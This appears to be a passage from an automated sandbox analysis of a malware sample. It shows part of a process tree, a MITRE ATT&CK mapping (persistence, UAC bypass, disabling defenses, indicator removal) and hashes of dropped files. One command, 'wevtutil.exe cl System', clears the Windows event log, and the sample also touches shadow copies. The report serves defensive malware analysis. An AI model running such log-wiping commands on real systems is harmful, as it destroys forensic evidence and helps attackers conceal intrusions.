- Interacts with shadow copies
PID:15932
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 8448 -ip 84481⤵PID:16088
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51fa43646bb395636ffefa58885ec29a2
SHA1a16471d493da8629a3b01310e0cffead66eb2509
SHA2560f0e9d71a233cb2cdc4774d31d4108793c075d76f2fcf11162fe93007175c411
SHA512145d918d8fb06eba881011ad0b39e56ffe91091be0e324e0734ad287b7611aed74ac3e040b2b50df529414bfff2c7e89420fe908803ed426bae38c8397c7c6b7
-
Filesize
12KB
MD50f7ad58a7dd7061ce92cac4cac653a83
SHA1a20aa216cdf981fd2d8146ad892393ac171aa9ae
SHA256a427be61b16a5794ee4b5917ec16705bb40dec0c37002d9f492f02112552b33e
SHA512418475edcb4375441469d0850132780c305bf965dfa6ef614737a512a3a806919679b2d7fb1ceed9a743f1598f08b63ec4c68061ab8e7b2fb7efd3bcb30fd12d
-
Filesize
684B
MD58f4a22a4f622febc0f2846c619d5231d
SHA1e9f80de47d0455ee451b9fd5b10dafa8d9ad0d2a
SHA25600d76974a4f04ce07cae9c0c34a6a17354c28424bcebe5fbfe10ab312c60ec3a
SHA5120cd15f7664886795a3cf0152318a841b2b627126ac1f518aae459cbbbe240c7531a5139c58fbd6b65b37099a7091b3b2981349d80dfb92f9ab65d737c7d9976d